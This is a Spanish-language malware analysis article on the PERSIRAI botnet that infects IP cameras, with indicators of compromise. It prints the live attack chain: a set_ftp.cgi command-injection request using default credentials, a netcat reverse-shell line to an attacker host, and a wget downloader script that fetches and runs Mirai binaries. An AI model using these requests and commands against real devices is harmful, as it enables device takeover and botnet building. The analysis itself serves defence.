PERSIRAI Malware que controla botnet de cámaras IP nos revela una verdad alarmante

La implementación de IoT o mejor conocido como Internet de las cosas es un término que se está involucrando cada vez más en nuestro diario vivir.

 Con una velocidad impresionante nos estamos rodeando de dispositivos conectados a Internet

Por desgracia, detrás de este internet de las cosas, puede estar un observador anónimo tratando de sacar un beneficio, especialmente cuando se revelan fallas para aprovechar, como ha sucedido con  cerca de 120,000 cámaras IP se quedaron infectadas por una versión de malware denominado  PERSIRAI, este malware según informes deTrendMicro, se cree que fue desarrollado como consecuencia de un informe de fallas que no tenía otra intención más que la de prevenir. El desafortunado autor de este documento es el especialista en seguridad Peter Kim, quien realizó un estudio basado en cámaras conectadas y detectó fallas. La información se hizo del dominio público el 8 de Marco del 2017 y como ha pasado ya en otras ocasiones, no tardaron los hackers en desarrollar un código malicioso basándose en tal vulnerabilidad.

Por medio de la herramienta Shodan pudo estimarse el alcance de PERSIRAI, ya que permite descubrir, cual de tus dispositivos se encuentra conectado a Internet, en qué  lugar y quién lo está utilizando.

 

TIMELINE

Como se mencionó anteriormente, el desarrollo de este malware está basado en las vulnerabilidades del informe de Peter Kim, donde se mencionan, 2 fallas de las cámaras que analizó:

o   Falla al proporcionar inicio de sesión y loginpas en blanco.

o  Al inyectar set_ftp.cgi para obtener privilegios de root y proveer root Shell remoto en el dispositivo.

Se ha identificado que los creadores de PERSIRAI aprendieron de la experiencia de otros códigos maliciosos como MIRAI y TheMoon, analizaron lo que a éstos les funcionó y lo mejoraron para dar origen a un nuevo ataque.

Un dato curioso es que, en la historia de estos malware enfocados a la negación de servicios, en caso de encontrar uno similar instalado en el dispositivo, lo bloquean para garantizar tener el control. Una funcionalidad adicional que deben incluir a favor de que su ataque resulte efectivo.

A continuación se explican algunas de las características de ataque de sus predecesores.

MIRAI

Este malware, fue detectado en Agosto del 2016, y es quizá el más conocido, debido a que provocó el ataque mas largo de DDoS en la historia. PERSIRAI tiene una gran similitud con el, gracias a que en octubre del 2016 el código de MIRAI se dejó libre con lo que otros desarrolladores tuvieron la oportunidad de basar en el sus nuevas versiones con mejores técnicas.

La forma en que MIRAI se distribuyo fue por medio de un bots que constantemente estaban a la búsqueda de víctimas potenciales para replicarse. Tenía métodos para aplicar según fuera el caso, ya sea para una posible víctima bajo Windows o bajo Linux.

DvrHelper

También se encuentra muy relacionado con MIRAI y mejoró las brechas de seguridad que surgieron gracia a Mirai.

Para ello le incluyeron 8 módulos mas de DDos e incluso se le atribuye ser el primer malware con técnicas para superar métodos preventivos anti-DDos.

TheMoon

El predecesor más antiguo de PERSIRAI fue descubierto en 2014 pero ha seguido evolucionando. Se cree que logró infectar en EU el 51 % de los dispositivos y como dato curioso, al dejar infectado el dispositivo, cambiaba un archivo renombrándolo con una leyenda escrita en albanés.

Los puertos que ataca son los siguientes:

TCP/22 (SSH Remote Login Protocol), TCP/23 (Telnet), TCP/80 (HTTP), TCP/443 (HTTP over SSL/TLS), TCP/7547 (CPE WAN Management Protocol), TCP/8080 (puerto alternativo para HTTP) and UDP/9999 (ASUS Router Infosvr).

 

ANÁLISIS DE INFECCIÓN

En un análisis realizado por netLab.360  y TrendMicro se pueden destacar los siguientes comportamientos de PERSIRAI.

Hablando del módulo de exploración de puertos, ha tomado parte del código de Mirai, pero contiene diferencias en el protocolo de comunicación y otros más, es cierto que en los códigos aún quedan binarios mencionando Mirai, pero la estructura solo se ha apoyado en ella parcialmente.

o   Una vez que consigue infectar el dispositivo, cambia el scan de puerto del 80 al 81

o   Posteriormente verifica que exista la página login.cgi

o   Se utiliza la vulnerabilidad detectada para entregar la carga útil.

En una revisión del puerto 81 realizada por los expertos, se pudo observar que a partir del 16 de abril del 2016 cuando comenzó el escaneo, hubo un brinco considerable en el actividad relacionada con este puerto. De un día para otro, aumentó a 400% y para el 22 de abril, este puerto había pasado a más de 57,000 conexiones.

 

PAYLOAD

El payload base está contenido como se previó por Peter Kim dentro de sef.ftp.cgi

Que al ser decodificado se obtiene según la muestra de NetLab 360

nc load.gtpnet.ir 1234 -e bin/sh

Otros archivos involucrados en el proceso de infección son:

cd20dcacf52cfe2b5c2a8950daf9220d wificam.sh

428111c22627e1d4ee87705251704422 mirai.arm

9584b6aec418a2af4efac24867a8c7ec mirai.arm5n

5ebeff1f005804bb8afef91095aac1d9 mirai.arm7

b2b129d84723d0ba2f803a546c8b19ae mirai.mips

2f6e964b3f63b13831314c28185bb51a mirai.mpsl

 

PROCESO

  1. El exploit, inyecta una orden

GET login.cgi HTTP/1.1

GET /set_ftp.cgi?loginuse=admin&loginpas=admin&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+load.gtpnet.ir+1234+-e+%2Fbin%2Fsh%29 HTTP/1.1

GET /ftptest.cgi?loginuse=admin&loginpas=admin HTTP/1.1

  1.    Esta orden obliga a la víctima a inicializar una conexión tipo nc hacia:

load.gtpnet.ir:1234

  1. Una vez realizada la conexión nc, la víctima descarga y ejecuta el script :

hxxp: //ntp.gtpnet.ir/wificam.sh

Y continúa descargando todos los demás archivos mostrados anteriormente, mirai.arm, mirai.arm5n, mirai.arm7, mirai.mips, mirai.mpsl desde el servidor hxxp:// Ntp.gtpnet.ir

el archivo txt de wificam.sh contiene:

$ nc load.gtpnet.ir 1234`

busybox nohup sh -c “wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &`

Otras instrucciones contenidas dentro de wificam.sh para la bajada de archivos.

wget hxxp://ntp.gtpnet.ir/mirai.arm -O /tmp/arm.bin

wget hxxp://ntp.gtpnet.ir/mirai.arm5n -O /tmp/arm5.bin

wget hxxp://ntp.gtpnet.ir/mirai.arm7 -O /tmp/arm7.bin

wget hxxp://ntp.gtpnet.ir/mirai.mips -O /tmp/mips.bin

wget hxxp://ntp.gtpnet.ir/mirai.mpsl -O /tmp/mpsl.bin

chmod +x /tmp/arm.bin

chmod +x /tmp/arm5.bin

chmod +x /tmp/arm7.bin

chmod +x /tmp/mips.bin

chmod +x /tmp/mpsl.bin

killall *.bin

killall arm

killall arm5

killall arm7

killall mips

killall mpsl

killall hal

/tmp/arm.bin

/tmp/arm5.bin

/tmp/arm7.bin

/tmp/mips.bin

/tmp/mpsl.bin

rm -rf /tmp/*.bin

  1. El dispositivo se encuentra listo para el ataque de DDos una vez que se han descargado y ejecutado cada uno de los archivos.

Posterior a recibir las órdenes del servidor C&C la cámara IP puede iniciar un ataque automáticamente contra otras cámaras haciendo uso de la vulnerabilidad expuesta obteniendo el archivo de contraseñas del usuario lo que permite esparcir la infección.

 

DOMINIOS Y SU COMPORTAMIENTO

Dos dominios se encuentran implicados en el proceso según la ingeniería inversa aplicada:

Del primero, solamente se obtiene el descargador inicial, mientras que del segundo se obtiene tanto el  wificam.sh, como los otros cinco archivos restantes. También se le puede adjudicar la responsabilidad de estar en comunicación con todos los bot y está soportando una carga pesada dadas las dimensiones de botnet que se está generando.

ANALIZANDO PISTAS DEL DESARROLLADOR

Según la revisión, el desarrollador del malware parece provenir de Irán debido a un identificador de país en el C&C , también se encontraron algunos caracteres persas que el creador del malware utilizó.

 

Caracteres notables

 

INDICADORES DE COMPROMISO

SHA256 Hashes relacionados con ELF_PERSIRAI.A:

d00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45

f974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a

af4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb

aa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61

4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a

44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778

a58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92

7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0

4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b

264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc

ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c

ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f

f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489

e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c

35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32

MD5

FileHash-MD5

f620fb57352e6f393477a65101a4612e

Según las muestras de netlab 360

cd20dcacf52cfe2b5c2a8950daf9220d  wificam.sh

428111c22627e1d4ee87705251704422  mirai.arm

9584b6aec418a2af4efac24867a8c7ec  mirai.arm5n

5ebeff1f005804bb8afef91095aac1d9  mirai.arm7

b2b129d84723d0ba2f803a546c8b19ae  mirai.mips

2f6e964b3f63b13831314c28185bb51a  mirai.mpsl

Servidores

ntp.gtpnet.ir

load.gtpnet.ir

 

CONCLUSIÓN

Por fortuna, esta botnet no ha llevado a cabo ningún ataque de tipo DDoS aún, y fue desenmascarada probablemente a tiempo, pero es un hecho que la seguridad en dispositivos conectados a Internet es un asunto que se deben tomar con mayor prioridad los fabricantes.

PERSIRAI viene a dar a conocer la infraestructura que probablemente continúen utilizando los desarrolladores para este tipo de ataques y dado que son cada vez más frecuentes, en el futuro se espera que los consumidores busquen mayores garantías de seguridad y esto será un factor determinante para que se sientan o no inclinados a adquirir un nuevo dispositivo IoT.

Por otra parte, mientras que este asunto de la seguridad incluida mejora, lo que resta para quienes poseen cámaras IP es verificar que sus contraseñas no sean las proporcionadas por default, es conveniente cambiarlas lo más pronto posible por una contraseña de alta seguridad. Esto no es una garantía, pues existen muy buenos algoritmos que por la fuerza pueden adivinarla, pero puede frenar una conexión o demorarla por algún tiempo.

Share with your friends










Submit
Tags: